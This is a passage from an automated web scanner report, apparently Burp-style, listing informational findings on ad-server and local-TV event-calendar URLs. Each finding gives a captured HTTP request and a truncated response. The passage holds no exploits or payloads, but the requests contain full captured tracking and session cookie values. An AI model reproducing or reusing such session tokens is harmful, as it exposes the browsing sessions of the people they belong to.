Date: Sat, 29 Jan 2011 01:15:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.71. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Request

Response

27.72. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11911576582@x23

Request

Response

27.73. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.74. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:55:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.75. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Request

Response

27.76. http://dm.de.mookie1.com/2/B3DM/2010DM/12119796835@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12119796835@x23

Request

GET /2/B3DM/2010DM/12119796835@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.77. http://dm.de.mookie1.com/2/B3DM/2010DM/12145795389@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12145795389@x23

Request

GET /2/B3DM/2010DM/12145795389@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268925

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.78. http://dm.de.mookie1.com/2/B3DM/2010DM/122038498@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/122038498@x23

Request

GET /2/B3DM/2010DM/122038498@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296266789

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Request

Response

27.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1636403816@x23

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:14:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.82. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1670623313@x23

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:19:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.83. http://dm.de.mookie1.com/2/B3DM/2010DM/1682100952@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1682100952@x23

Request

GET /2/B3DM/2010DM/1682100952@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270606

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.84. http://dm.de.mookie1.com/2/B3DM/2010DM/1838084819@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1838084819@x23

Request

GET /2/B3DM/2010DM/1838084819@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269250

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1845536281@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1845536281@x23

Request

GET /2/B3DM/2010DM/1845536281@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270656

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Request

Response

27.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1902448725@x23

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2458
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.88. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Request

GET /2/B3DM/DLX/11678985058@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2520
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_li
...[SNIP]...

27.89. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 666
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

var oas_d=new Dat
...[SNIP]...

27.90. http://events.cbs6albany.com/site_indexes/allcurrenteventslist150m0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/site_indexes/allcurrenteventslist150m0.html

Request

GET /site_indexes/allcurrenteventslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 151869

<html>
<head><title>Events & Activities Calendar near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/norfolk-ct/events/show/86926918-star-membership'>Star Membe
...[SNIP]...

27.91. http://events.cbs6albany.com/site_indexes/allcurrentmovieslist150m0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/site_indexes/allcurrentmovieslist150m0.html

Request

GET /site_indexes/allcurrentmovieslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
